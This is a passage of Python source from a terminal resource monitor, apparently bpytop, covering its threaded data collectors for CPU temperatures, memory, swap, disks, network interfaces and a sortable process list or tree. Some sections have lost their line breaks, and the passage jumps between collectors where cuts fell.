for p in list(cls.pid_counter): if not psutil.pid_exists(p): del cls.pid_counter[p], Graphs.pid_cpu[p] Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active) cls.redraw = cls.resized = cls.moved = False class Collector: '''Data collector master class * .start(): Starts collector thread * .stop(): Stops collector thread * .collect(*collectors: Collector, draw_now: bool = True, interrupt: bool = False): queues up collectors to run''' stopping: bool = False started: bool = False draw_now: bool = False redraw: bool = False only_draw: bool = False thread: threading.Thread collect_run = threading.Event() collect_idle = threading.Event() collect_idle.set() collect_done = threading.Event() collect_queue: List = [] collect_interrupt: bool = False proc_interrupt: bool = False use_draw_list: bool = False @classmethod def start(cls): cls.stopping = False cls.thread = threading.Thread(target=cls._runner, args=()) cls.thread.start() cls.started = True @classmethod def stop(cls): if cls.started and cls.thread.is_alive(): cls.stopping = True cls.started = False cls.collect_queue = [] cls.collect_idle.set() cls.collect_done.set() try: cls.thread.join() except: pass @classmethod def _runner(cls): '''This is meant to run in it's own thread, collecting and drawing when collect_run is set''' draw_buffers: List[str] = [] debugged: bool = False try: while not cls.stopping: if CONFIG.draw_clock and CONFIG.update_ms != 1000: Box.draw_clock() cls.collect_run.wait(0.1) if not cls.collect_run.is_set(): continue draw_buffers = [] cls.collect_interrupt = False cls.collect_run.clear() cls.collect_idle.clear() cls.collect_done.clear() if DEBUG and not debugged: TimeIt.start("Collect and draw") while cls.collect_queue: collector = cls.collect_queue.pop() if not cls.only_draw: collector._collect() collector._draw() if cls.use_draw_list: draw_buffers.append(collector.buffer) if cls.collect_interrupt: break if DEBUG and not debugged: TimeIt.stop("Collect and draw"); debugged = 
True if cls.draw_now and not Menu.active and not cls.collect_interrupt: if cls.use_draw_list: Draw.out(*draw_buffers) else: Draw.out() if CONFIG.draw_clock and CONFIG.update_ms == 1000: Box.draw_clock() cls.collect_idle.set() cls.collect_done.set() except Exception as e: errlog.exception(f'Data collection thread failed with exception: {e}') cls.collect_idle.set() cls.collect_done.set() clean_quit(1, thread=True) @classmethod def collect(cls, *collectors, draw_now: bool = True, interrupt: bool = False, proc_interrupt: bool = False, redraw: bool = False, only_draw: bool = False): '''Setup collect queue for _runner''' cls.collect_interrupt = interrupt cls.proc_interrupt = proc_interrupt cls.collect_idle.wait() cls.collect_interrupt = False cls.proc_interrupt = False cls.use_draw_list = False cls.draw_now = draw_now cls.redraw = redraw cls.only_draw = only_draw if collectors: cls.collect_queue = [*collectors] cls.use_draw_list = True else: cls.collect_queue = list(cls.__subclasses__()) cls.collect_run.set() class CpuCollector(Collector): '''Collects cpu usage for cpu and cores, cpu frequency, load_avg, uptime and cpu temps''' cpu_usage: List[List[int]] = [] cpu_temp: List[List[int]] = [] cpu_temp_high: int = 0 cpu_temp_crit: int = 0 for _ in range(THREADS + 1): cpu_usage.append([]) cpu_temp.append([]) freq_error: bool = False cpu_freq: int = 0 load_avg: List[float] = [] uptime: str = "" buffer: str = CpuBox.buffer sensor_method: str = "" got_sensors: bool = False sensor_swap: bool = False cpu_temp_only: bool = False @classmethod def get_sensors(cls): '''Check if we can get cpu temps and return method of getting temps''' cls.sensor_method = "" if SYSTEM == "MacOS": try: if which("coretemp") and subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip().replace("-", "").isdigit(): cls.sensor_method = "coretemp" elif which("osx-cpu-temp") and subprocess.check_output("osx-cpu-temp", universal_newlines=True).rstrip().endswith("°C"): cls.sensor_method = 
"osx-cpu-temp" except: pass elif CONFIG.cpu_sensor != "Auto" and CONFIG.cpu_sensor in CONFIG.cpu_sensors: cls.sensor_method = "psutil" elif hasattr(psutil, "sensors_temperatures"): try: temps = psutil.sensors_temperatures() if temps: for name, entries in temps.items(): if name.lower().startswith("cpu"): cls.sensor_method = "psutil" break for entry in entries: if entry.label.startswith(("Package", "Core 0", "Tdie", "CPU")): cls.sensor_method = "psutil" break except: pass if not cls.sensor_method and SYSTEM == "Linux": try: if which("vcgencmd") and subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip().endswith("'C"): cls.sensor_method = "vcgencmd" except: pass cls.got_sensors = bool(cls.sensor_method) @classmethod def _collect(cls): cls.cpu_usage[0].append(round(psutil.cpu_percent(percpu=False))) if len(cls.cpu_usage[0]) > Term.width * 4: del cls.cpu_usage[0][0] for n, thread in enumerate(psutil.cpu_percent(percpu=True), start=1): cls.cpu_usage[n].append(round(thread)) if len(cls.cpu_usage[n]) > Term.width * 2: del cls.cpu_usage[n][0] try: if hasattr(psutil.cpu_freq(), "current"): cls.cpu_freq = round(psutil.cpu_freq().current) except Exception as e: if not cls.freq_error: cls.freq_error = True errlog.error("Exception while getting cpu frequency!") errlog.exception(f'{e}') else: pass cls.load_avg = [round(lavg, 2) for lavg in os.getloadavg()] cls.uptime = str(timedelta(seconds=round(time()-psutil.boot_time(),0)))[:-3] if CONFIG.check_temp and cls.got_sensors: cls._collect_temps() @classmethod def _collect_temps(cls): temp: int = 1000 cores: List[int] = [] core_dict: Dict[int, int] = {} entry_int: int = 0 cpu_type: str = "" c_max: int = 0 s_name: str = "_-_" s_label: str = "_-_" if cls.sensor_method == "psutil": try: if CONFIG.cpu_sensor != "Auto": s_name, s_label = CONFIG.cpu_sensor.split(":", 1) for name, entries in psutil.sensors_temperatures().items(): for num, entry in enumerate(entries, 1): if name == s_name and (entry.label == 
s_label or str(num) == s_label) and round(entry.current) > 0: if entry.label.startswith("Package"): cpu_type = "intel" elif entry.label.startswith("Tdie"): cpu_type = "ryzen" else: cpu_type = "other" if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high) else: cls.cpu_temp_high = 80 if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical) else: cls.cpu_temp_crit = 95 temp = round(entry.current) elif entry.label.startswith(("Package", "Tdie")) and cpu_type in ["", "other"] and s_name == "_-_" and hasattr(entry, "current") and round(entry.current) > 0: if not cls.cpu_temp_high or cls.sensor_swap or cpu_type == "other": cls.sensor_swap = False if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high) else: cls.cpu_temp_high = 80 if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical) else: cls.cpu_temp_crit = 95 cpu_type = "intel" if entry.label.startswith("Package") else "ryzen" temp = round(entry.current) elif (entry.label.startswith(("Core", "Tccd", "CPU")) or (name.lower().startswith("cpu") and not entry.label)) and hasattr(entry, "current") and round(entry.current) > 0: if entry.label.startswith(("Core", "Tccd")): entry_int = int(entry.label.replace("Core", "").replace("Tccd", "")) if entry_int in core_dict and cpu_type != "ryzen": if c_max == 0: c_max = max(core_dict) + 1 if c_max < THREADS // 2 and (entry_int + c_max) not in core_dict: core_dict[(entry_int + c_max)] = round(entry.current) continue elif entry_int in core_dict: continue core_dict[entry_int] = round(entry.current) continue elif cpu_type in ["intel", "ryzen"]: continue if not cpu_type: cpu_type = "other" if not cls.cpu_temp_high or cls.sensor_swap: cls.sensor_swap = False if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high) else: cls.cpu_temp_high = 60 if name == 
"cpu_thermal" else 80 if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical) else: cls.cpu_temp_crit = 80 if name == "cpu_thermal" else 95 temp = round(entry.current) cores.append(round(entry.current)) if core_dict: if not temp or temp == 1000: temp = sum(core_dict.values()) // len(core_dict) if not cls.cpu_temp_high or not cls.cpu_temp_crit: cls.cpu_temp_high, cls.cpu_temp_crit = 80, 95 cls.cpu_temp[0].append(temp) if cpu_type == "ryzen": ccds: int = len(core_dict) cores_per_ccd: int = CORES // ccds z: int = 1 for x in range(THREADS): if x == CORES: z = 1 if CORE_MAP[x] + 1 > cores_per_ccd * z: z += 1 if z in core_dict: cls.cpu_temp[x+1].append(core_dict[z]) else: for x in range(THREADS): if CORE_MAP[x] in core_dict: cls.cpu_temp[x+1].append(core_dict[CORE_MAP[x]]) elif len(cores) == THREADS / 2: cls.cpu_temp[0].append(temp) for n, t in enumerate(cores, start=1): try: cls.cpu_temp[n].append(t) cls.cpu_temp[THREADS // 2 + n].append(t) except IndexError: break else: cls.cpu_temp[0].append(temp) if len(cores) > 1: for n, t in enumerate(cores, start=1): try: cls.cpu_temp[n].append(t) except IndexError: break except Exception as e: errlog.exception(f'{e}') cls.got_sensors = False CpuBox._calc_size() else: try: if cls.sensor_method == "coretemp": temp = max(0, int(subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip())) cores = [max(0, int(x)) for x in subprocess.check_output("coretemp", universal_newlines=True).split()] if len(cores) == THREADS / 2: cls.cpu_temp[0].append(temp) for n, t in enumerate(cores, start=1): try: cls.cpu_temp[n].append(t) cls.cpu_temp[THREADS // 2 + n].append(t) except IndexError: break else: cores.insert(0, temp) for n, t in enumerate(cores): try: cls.cpu_temp[n].append(t) except IndexError: break if not cls.cpu_temp_high: cls.cpu_temp_high = 85 cls.cpu_temp_crit = 100 elif cls.sensor_method == "osx-cpu-temp": temp = max(0, 
class MemCollector(Collector):
    '''Collects memory and disks information'''
    # Memory values/strings keyed by "total", "free", "available", "used", "cached"
    values: Dict[str, int] = {}
    vlist: Dict[str, List[int]] = {}
    percent: Dict[str, int] = {}
    string: Dict[str, str] = {}

    swap_values: Dict[str, int] = {}
    swap_vlist: Dict[str, List[int]] = {}
    swap_percent: Dict[str, int] = {}
    swap_string: Dict[str, str] = {}

    disks: Dict[str, Dict]
    # Last seen (read_bytes, write_bytes) per device, for io rate calculation
    disk_hist: Dict[str, Tuple] = {}
    timestamp: float = time()

    io_error: bool = False

    old_disks: List[str] = []

    # Filesystem types never shown
    excludes: List[str] = ["squashfs"]
    if SYSTEM == "BSD": excludes += ["devfs", "tmpfs", "procfs", "linprocfs", "gvfs", "fusefs"]

    buffer: str = MemBox.buffer

    @classmethod
    def _collect(cls):
        '''Collect memory, swap and (optionally) per-disk usage and io rates.'''
        #* Collect memory
        mem = psutil.virtual_memory()
        if hasattr(mem, "cached"):
            cls.values["cached"] = mem.cached
        else:
            cls.values["cached"] = mem.active
        cls.values["total"], cls.values["free"], cls.values["available"] = mem.total, mem.free, mem.available
        cls.values["used"] = cls.values["total"] - cls.values["available"]

        for key, value in cls.values.items():
            cls.string[key] = floating_humanizer(value)
            if key == "total": continue
            cls.percent[key] = round(value * 100 / cls.values["total"])
            if CONFIG.mem_graphs:
                if not key in cls.vlist: cls.vlist[key] = []
                cls.vlist[key].append(cls.percent[key])
                if len(cls.vlist[key]) > MemBox.width: del cls.vlist[key][0]

        #* Collect swap
        if CONFIG.show_swap or CONFIG.swap_disk:
            swap = psutil.swap_memory()
            cls.swap_values["total"], cls.swap_values["free"] = swap.total, swap.free
            cls.swap_values["used"] = cls.swap_values["total"] - cls.swap_values["free"]

            if swap.total:
                if not MemBox.swap_on:
                    MemBox.redraw = True
                    MemBox.swap_on = True
                for key, value in cls.swap_values.items():
                    cls.swap_string[key] = floating_humanizer(value)
                    if key == "total": continue
                    cls.swap_percent[key] = round(value * 100 / cls.swap_values["total"])
                    if CONFIG.mem_graphs:
                        if not key in cls.swap_vlist: cls.swap_vlist[key] = []
                        cls.swap_vlist[key].append(cls.swap_percent[key])
                        if len(cls.swap_vlist[key]) > MemBox.width: del cls.swap_vlist[key][0]
            else:
                if MemBox.swap_on:
                    MemBox.redraw = True
                MemBox.swap_on = False
        else:
            if MemBox.swap_on:
                MemBox.redraw = True
            MemBox.swap_on = False

        if not CONFIG.show_disks: return

        #* Collect disks usage
        disk_read: int = 0
        disk_write: int = 0
        dev_name: str
        disk_name: str
        filtering: Tuple = ()
        filter_exclude: bool = False
        io_string: str
        u_percent: int
        disk_list: List[str] = []
        cls.disks = {}

        if CONFIG.disks_filter:
            if CONFIG.disks_filter.startswith("exclude="):
                filter_exclude = True
                filtering = tuple(v.strip() for v in CONFIG.disks_filter.replace("exclude=", "").strip().split(","))
            else:
                filtering = tuple(v.strip() for v in CONFIG.disks_filter.strip().split(","))

        try:
            io_counters = psutil.disk_io_counters(perdisk=SYSTEM == "Linux", nowrap=True)
        except ValueError as e:
            if not cls.io_error:
                cls.io_error = True
                errlog.error(f'Non fatal error during disk io collection!')
                if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
                    errlog.error(f'Caused by outdated psutil version.')
                errlog.exception(f'{e}')
            io_counters = None

        for disk in psutil.disk_partitions():
            disk_io = None
            io_string = ""
            disk_name = disk.mountpoint.rsplit('/', 1)[-1] if not disk.mountpoint == "/" else "root"
            #while disk_name in disk_list: disk_name += "_"
            disk_list += [disk_name]
            if cls.excludes and disk.fstype in cls.excludes:
                continue
            if filtering and ((not filter_exclude and not disk.mountpoint in filtering) or (filter_exclude and disk.mountpoint in filtering)):
                continue
            #elif filtering and disk_name.endswith(filtering)
            if SYSTEM == "MacOS" and disk.mountpoint == "/private/var/vm":
                continue
            try:
                disk_u = psutil.disk_usage(disk.mountpoint)
            except:
                #* FIX: was `pass`, which fell through and used an undefined (or previous
                #* disk's stale) disk_u below; skip unreadable mountpoints instead
                continue
            u_percent = round(disk_u.percent)
            cls.disks[disk.device] = { "name" : disk_name, "used_percent" : u_percent, "free_percent" : 100 - u_percent }
            for name in ["total", "used", "free"]:
                cls.disks[disk.device][name] = floating_humanizer(getattr(disk_u, name, 0))

            #* Collect disk io
            if io_counters:
                try:
                    if SYSTEM == "Linux":
                        dev_name = os.path.realpath(disk.device).rsplit('/', 1)[-1]
                        if dev_name.startswith("md"):
                            try:
                                dev_name = dev_name[:dev_name.index("p")]
                            except:
                                pass
                        disk_io = io_counters[dev_name]
                    elif disk.mountpoint == "/":
                        disk_io = io_counters
                    else:
                        raise Exception
                    disk_read = round((disk_io.read_bytes - cls.disk_hist[disk.device][0]) / (time() - cls.timestamp))
                    disk_write = round((disk_io.write_bytes - cls.disk_hist[disk.device][1]) / (time() - cls.timestamp))
                except:
                    disk_read = disk_write = 0
            else:
                disk_read = disk_write = 0

            if disk_io:
                cls.disk_hist[disk.device] = (disk_io.read_bytes, disk_io.write_bytes)
                if MemBox.disks_width > 30:
                    if disk_read > 0:
                        io_string += f'▲{floating_humanizer(disk_read, short=True)} '
                    if disk_write > 0:
                        io_string += f'▼{floating_humanizer(disk_write, short=True)}'
                elif disk_read + disk_write > 0:
                    io_string += f'▼▲{floating_humanizer(disk_read + disk_write, short=True)}'

            cls.disks[disk.device]["io"] = io_string

        #* Optionally show swap as a pseudo disk, placed right after the root entry
        if CONFIG.swap_disk and MemBox.swap_on:
            cls.disks["__swap"] = { "name" : "swap", "used_percent" : cls.swap_percent["used"], "free_percent" : cls.swap_percent["free"], "io" : "" }
            for name in ["total", "used", "free"]:
                cls.disks["__swap"][name] = cls.swap_string[name]
            if len(cls.disks) > 2:
                try:
                    new = { list(cls.disks)[0] : cls.disks.pop(list(cls.disks)[0])}
                    new["__swap"] = cls.disks.pop("__swap")
                    new.update(cls.disks)
                    cls.disks = new
                except:
                    pass

        if disk_list != cls.old_disks:
            MemBox.redraw = True
            cls.old_disks = disk_list.copy()

        cls.timestamp = time()

    @classmethod
    def _draw(cls):
        MemBox._draw_fg()
len(cls.nics) - 1 cls.new_nic = cls.nics[cls.nic_i] cls.switched = True Collector.collect(NetCollector, redraw=True) @classmethod def _collect(cls): speed: int stat: Dict up_stat = psutil.net_if_stats() if cls.switched: cls.nic = cls.new_nic cls.switched = False if not cls.nic or cls.nic not in up_stat or not up_stat[cls.nic].isup: cls._get_nics() if not cls.nic: return try: io_all = psutil.net_io_counters(pernic=True)[cls.nic] except KeyError: pass return if not cls.nic in cls.stats: cls.stats[cls.nic] = {} cls.strings[cls.nic] = { "download" : {}, "upload" : {}} for direction, value in ["download", io_all.bytes_recv], ["upload", io_all.bytes_sent]: cls.stats[cls.nic][direction] = { "total" : value, "last" : value, "top" : 0, "graph_top" : 0, "offset" : 0, "speed" : [], "redraw" : True, "graph_raise" : 0, "graph_lower" : 7 } for v in ["total", "byte_ps", "bit_ps", "top", "graph_top"]: cls.strings[cls.nic][direction][v] = "" cls.stats[cls.nic]["download"]["total"] = io_all.bytes_recv cls.stats[cls.nic]["upload"]["total"] = io_all.bytes_sent for direction in ["download", "upload"]: stat = cls.stats[cls.nic][direction] strings = cls.strings[cls.nic][direction] #* Calculate current speed stat["speed"].append(round((stat["total"] - stat["last"]) / (time() - cls.timestamp))) stat["last"] = stat["total"] speed = stat["speed"][-1] if cls.net_min[direction] == -1: cls.net_min[direction] = units_to_bytes(getattr(CONFIG, "net_" + direction)) stat["graph_top"] = cls.net_min[direction] stat["graph_lower"] = 7 if not cls.auto_min: stat["redraw"] = True strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True) if stat["offset"] and stat["offset"] > stat["total"]: cls.reset = True if cls.reset: if not stat["offset"]: stat["offset"] = stat["total"] else: stat["offset"] = 0 if direction == "upload": cls.reset = False NetBox.redraw = True if len(stat["speed"]) > NetBox.width * 2: del stat["speed"][0] strings["total"] = floating_humanizer(stat["total"] - 
stat["offset"]) strings["byte_ps"] = floating_humanizer(stat["speed"][-1], per_second=True) strings["bit_ps"] = floating_humanizer(stat["speed"][-1], bit=True, per_second=True) if speed > stat["top"] or not stat["top"]: stat["top"] = speed strings["top"] = floating_humanizer(stat["top"], bit=True, per_second=True) if cls.auto_min: if speed > stat["graph_top"]: stat["graph_raise"] += 1 if stat["graph_lower"] > 0: stat["graph_lower"] -= 1 elif speed < stat["graph_top"] // 10: stat["graph_lower"] += 1 if stat["graph_raise"] > 0: stat["graph_raise"] -= 1 if stat["graph_raise"] >= 5 or stat["graph_lower"] >= 5: if stat["graph_raise"] >= 5: stat["graph_top"] = round(max(stat["speed"][-5:]) / 0.8) elif stat["graph_lower"] >= 5: stat["graph_top"] = max(10 << 10, max(stat["speed"][-5:]) * 3) stat["graph_raise"] = 0 stat["graph_lower"] = 0 stat["redraw"] = True strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True) cls.timestamp = time() if CONFIG.net_sync: c_max: int = max(cls.stats[cls.nic]["download"]["graph_top"], cls.stats[cls.nic]["upload"]["graph_top"]) if c_max != cls.sync_top: cls.sync_top = c_max cls.sync_string = floating_humanizer(cls.sync_top, short=True) NetBox.redraw = True @classmethod def _draw(cls): NetBox._draw_fg() class ProcCollector(Collector): '''Collects process stats''' buffer: str = ProcBox.buffer search_filter: str = "" processes: Dict = {} num_procs: int = 0 det_cpu: float = 0.0 detailed: bool = False detailed_pid: Union[int, None] = None details: Dict[str, Any] = {} details_cpu: List[int] = [] details_mem: List[int] = [] expand: int = 0 collapsed: Dict = {} tree_counter: int = 0 p_values: List[str] = ["pid", "name", "cmdline", "num_threads", "username", "memory_percent", "cpu_percent", "cpu_times", "create_time"] sort_expr: Dict = {} sort_expr["pid"] = compile("p.info['pid']", "str", "eval") sort_expr["program"] = compile("'' if p.info['name'] == 0.0 else p.info['name']", "str", "eval") sort_expr["arguments"] = compile("' 
'.join(str(p.info['cmdline'])) or ('' if p.info['name'] == 0.0 else p.info['name'])", "str", "eval")
    sort_expr["threads"] = compile("0 if p.info['num_threads'] == 0.0 else p.info['num_threads']", "str", "eval")
    sort_expr["user"] = compile("'' if p.info['username'] == 0.0 else p.info['username']", "str", "eval")
    sort_expr["memory"] = compile("p.info['memory_percent']", "str", "eval")
    sort_expr["cpu lazy"] = compile("(sum(p.info['cpu_times'][:2] if not p.info['cpu_times'] == 0.0 else [0.0, 0.0]) * 1000 / (time() - p.info['create_time']))", "str", "eval")
    sort_expr["cpu responsive"] = compile("(p.info['cpu_percent'] if CONFIG.proc_per_core else (p.info['cpu_percent'] / THREADS))", "str", "eval")

    @classmethod
    def _collect(cls):
        '''List all processes with pid, name, arguments, threads, username, memory percent and cpu percent'''
        if Box.stat_mode:
            return
        out: Dict = {}
        cls.det_cpu = 0.0
        sorting: str = CONFIG.proc_sorting
        reverse: bool = not CONFIG.proc_reversed
        proc_per_cpu: bool = CONFIG.proc_per_core
        search: str = cls.search_filter
        # err (0.0) doubles as psutil's ad_value: attributes of dead/denied processes come back as 0.0
        err: float = 0.0
        n: int = 0

        # Tree view has no "arguments" column; fall back to sorting by program name
        if CONFIG.proc_tree and sorting == "arguments":
            sorting = "program"
        sort_cmd = cls.sort_expr[sorting]

        if CONFIG.proc_tree:
            cls._tree(sort_cmd=sort_cmd, reverse=reverse, proc_per_cpu=proc_per_cpu, search=search)
        else:
            for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
                if cls.collect_interrupt or cls.proc_interrupt:
                    return
                if p.info["name"] == "idle" or p.info["name"] == err or p.info["pid"] == err:
                    continue
                if p.info["cmdline"] == err:
                    p.info["cmdline"] = ""
                if p.info["username"] == err:
                    p.info["username"] = ""
                if p.info["num_threads"] == err:
                    p.info["num_threads"] = 0
                if search:
                    if cls.detailed and p.info["pid"] == cls.detailed_pid:
                        cls.det_cpu = p.info["cpu_percent"]
                    # for/else ladder: keep the process only if some comma-separated
                    # search term is a substring of some searchable field
                    for value in [ p.info["name"], " ".join(p.info["cmdline"]), str(p.info["pid"]), p.info["username"] ]:
                        for s in search.split(","):
                            if s.strip() in value:
                                break
                        else:
                            continue
                        break
                    else:
                        continue

                cpu = p.info["cpu_percent"] if proc_per_cpu else round(p.info["cpu_percent"] / THREADS, 2)
                mem = p.info["memory_percent"]
                if CONFIG.proc_mem_bytes and hasattr(p.info["memory_info"], "rss"):
                    mem_b = p.info["memory_info"].rss
                else:
                    mem_b = 0
                cmd = " ".join(p.info["cmdline"]) or "[" + p.info["name"] + "]"
                out[p.info["pid"]] = {
                    "name" : p.info["name"],
                    "cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
                    "threads" : p.info["num_threads"],
                    "username" : p.info["username"],
                    "mem" : mem,
                    "mem_b" : mem_b,
                    "cpu" : cpu }
                n += 1
            cls.num_procs = n
            cls.processes = out.copy()

        # How many extra detail columns fit in the detailed box (0-5)
        if cls.detailed:
            cls.expand = ((ProcBox.width - 2) - ((ProcBox.width - 2) // 3) - 40) // 10
            if cls.expand > 5:
                cls.expand = 5
        if cls.detailed and not cls.details.get("killed", False):
            try:
                c_pid = cls.detailed_pid
                det = psutil.Process(c_pid)
            except (psutil.NoSuchProcess, psutil.ZombieProcess):
                cls.details["killed"] = True
                cls.details["status"] = psutil.STATUS_DEAD
                ProcBox.redraw = True
            else:
                attrs: List[str] = ["status", "memory_info", "create_time"]
                if not SYSTEM == "MacOS":
                    attrs.extend(["cpu_num"])
                if cls.expand:
                    attrs.extend(["nice", "terminal"])
                    if not SYSTEM == "MacOS":
                        attrs.extend(["io_counters"])
                if not c_pid in cls.processes:
                    attrs.extend(["pid", "name", "cmdline", "num_threads", "username", "memory_percent"])
                cls.details = det.as_dict(attrs=attrs, ad_value="")
                if det.parent() != None:
                    cls.details["parent_name"] = det.parent().name()
                else:
                    cls.details["parent_name"] = ""
                cls.details["pid"] = c_pid
                # Prefer values already collected in the main process list when available
                if c_pid in cls.processes:
                    cls.details["name"] = cls.processes[c_pid]["name"]
                    cls.details["cmdline"] = cls.processes[c_pid]["cmd"]
                    cls.details["threads"] = f'{cls.processes[c_pid]["threads"]}'
                    cls.details["username"] = cls.processes[c_pid]["username"]
                    cls.details["memory_percent"] = cls.processes[c_pid]["mem"]
                    cls.details["cpu_percent"] = round(cls.processes[c_pid]["cpu"] * (1 if CONFIG.proc_per_core else THREADS))
                else:
                    cls.details["cmdline"] = " ".join(cls.details["cmdline"]) or "[" + cls.details["name"] + "]"
                    cls.details["threads"] = f'{cls.details["num_threads"]}'
                    cls.details["cpu_percent"] = round(cls.det_cpu)
                cls.details["killed"] = False
                if SYSTEM == "MacOS":
                    cls.details["cpu_num"] = -1
                    cls.details["io_counters"] = ""
                if hasattr(cls.details["memory_info"], "rss"):
                    cls.details["memory_bytes"] = floating_humanizer(cls.details["memory_info"].rss) # type: ignore
                else:
                    cls.details["memory_bytes"] = "? Bytes"
                if isinstance(cls.details["create_time"], float):
                    uptime = timedelta(seconds=round(time()-cls.details["create_time"],0))
                    if uptime.days > 0:
                        cls.details["uptime"] = f'{uptime.days}d {str(uptime).split(",")[1][:-3].strip()}'
                    else:
                        cls.details["uptime"] = f'{uptime}'
                else:
                    cls.details["uptime"] = "??:??:??"
                if cls.expand:
                    if cls.expand > 1 :
                        cls.details["nice"] = f'{cls.details["nice"]}'
                    # BSD exposes io counts, other systems io bytes
                    if SYSTEM == "BSD":
                        if cls.expand > 2:
                            if hasattr(cls.details["io_counters"], "read_count"):
                                cls.details["io_read"] = f'{cls.details["io_counters"].read_count}'
                            else:
                                cls.details["io_read"] = "?"
                        if cls.expand > 3:
                            if hasattr(cls.details["io_counters"], "write_count"):
                                cls.details["io_write"] = f'{cls.details["io_counters"].write_count}'
                            else:
                                cls.details["io_write"] = "?"
                    else:
                        if cls.expand > 2:
                            if hasattr(cls.details["io_counters"], "read_bytes"):
                                cls.details["io_read"] = floating_humanizer(cls.details["io_counters"].read_bytes)
                            else:
                                cls.details["io_read"] = "?"
                        if cls.expand > 3:
                            if hasattr(cls.details["io_counters"], "write_bytes"):
                                cls.details["io_write"] = floating_humanizer(cls.details["io_counters"].write_bytes)
                            else:
                                cls.details["io_write"] = "?"
                    if cls.expand > 4 :
                        cls.details["terminal"] = f'{cls.details["terminal"]}'.replace("/dev/", "")

            cls.details_cpu.append(cls.details["cpu_percent"])
            mem = cls.details["memory_percent"]
            # Non-linear scaling so small memory percentages remain visible in the mini graph
            if mem > 80: mem = round(mem)
            elif mem > 60: mem = round(mem * 1.2)
            elif mem > 30: mem = round(mem * 1.5)
            elif mem > 10: mem = round(mem * 2)
            elif mem > 5: mem = round(mem * 10)
            else: mem = round(mem * 20)
            cls.details_mem.append(mem)
            if len(cls.details_cpu) > ProcBox.width:
                del cls.details_cpu[0]
            if len(cls.details_mem) > ProcBox.width:
                del cls.details_mem[0]

    @classmethod
    def _tree(cls, sort_cmd, reverse: bool, proc_per_cpu: bool, search: str):
        '''List all processes in a tree view with pid, name, threads, username, memory percent and cpu percent'''
        out: Dict = {}
        err: float = 0.0
        det_cpu: float = 0.0
        infolist: Dict = {}
        cls.tree_counter += 1
        # tree maps ppid -> [child pids]
        tree = defaultdict(list)
        n: int = 0
        for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
            if cls.collect_interrupt:
                return
            try:
                tree[p.ppid()].append(p.pid)
            except (psutil.NoSuchProcess, psutil.ZombieProcess):
                pass
            else:
                infolist[p.pid] = p.info
                n += 1
        # pid 0 listing itself as its own child would cause infinite recursion below
        if 0 in tree and 0 in tree[0]:
            tree[0].remove(0)

        def create_tree(pid: int, tree: defaultdict, indent: str = "", inindent: str = " ", found: bool = False, depth: int = 0, collapse_to: Union[None, int] = None):
            # Recursively renders one process and its children; collapse_to is the pid of the
            # nearest collapsed ancestor, into which this subtree's stats are accumulated.
            nonlocal infolist, proc_per_cpu, search, out, det_cpu
            name: str; threads: int; username: str; mem: float; cpu: float; collapse: bool = False
            cont: bool = True
            getinfo: Dict = {}
            if cls.collect_interrupt:
                return
            try:
                name = psutil.Process(pid).name()
                if name == "idle": return
            except psutil.Error:
                pass
                cont = False
                name = ""
            if pid in infolist:
                getinfo = infolist[pid]

            if search and not found:
                if cls.detailed and pid == cls.detailed_pid:
                    det_cpu = getinfo["cpu_percent"]
                if "username" in getinfo and isinstance(getinfo["username"], float):
                    getinfo["username"] = ""
                if "cmdline" in getinfo and isinstance(getinfo["cmdline"], float):
                    getinfo["cmdline"] = ""
                # Same for/else search ladder as in _collect
                for value in [ name, str(pid), getinfo.get("username", ""), " ".join(getinfo.get("cmdline", "")) ]:
                    for s in search.split(","):
                        if s.strip() in value:
                            found = True
                            break
                    else:
                        continue
                    break
                else:
                    cont = False
            if cont:
                if getinfo:
                    if getinfo["num_threads"] == err:
                        threads = 0
                    else:
                        threads = getinfo["num_threads"]
                    if getinfo["username"] == err:
                        username = ""
                    else:
                        username = getinfo["username"]
                    cpu = getinfo["cpu_percent"] if proc_per_cpu else round(getinfo["cpu_percent"] / THREADS, 2)
                    mem = getinfo["memory_percent"]
                    if getinfo["cmdline"] == err:
                        cmd = ""
                    else:
                        cmd = " ".join(getinfo["cmdline"]) or "[" + getinfo["name"] + "]"
                    if CONFIG.proc_mem_bytes and hasattr(getinfo["memory_info"], "rss"):
                        mem_b = getinfo["memory_info"].rss
                    else:
                        mem_b = 0
                else:
                    # NOTE(review): cmd is left unbound on this path; out[pid] below would
                    # raise NameError if reached with cont True and empty getinfo — verify.
                    threads = mem_b = 0
                    username = ""
                    mem = cpu = 0.0

                if pid in cls.collapsed:
                    collapse = cls.collapsed[pid]
                else:
                    collapse = depth > CONFIG.tree_depth
                    cls.collapsed[pid] = collapse

                if collapse_to and not search:
                    # Subtree of a collapsed ancestor: fold stats into the ancestor's row
                    out[collapse_to]["threads"] += threads
                    out[collapse_to]["mem"] += mem
                    out[collapse_to]["mem_b"] += mem_b
                    out[collapse_to]["cpu"] += cpu
                else:
                    if pid in tree and len(tree[pid]) > 0:
                        sign: str = "+" if collapse else "-"
                        inindent = inindent.replace(" ├─ ", "[" + sign + "]─").replace(" └─ ", "[" + sign + "]─")
                    out[pid] = { "indent" : inindent, "name": name, "cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""), "threads" : threads, "username" : username, "mem" : mem, "mem_b" : mem_b, "cpu" : cpu, "depth" : depth, }

            if search:
                collapse = False
            elif collapse and not collapse_to:
                collapse_to = pid

            if pid not in tree:
                return
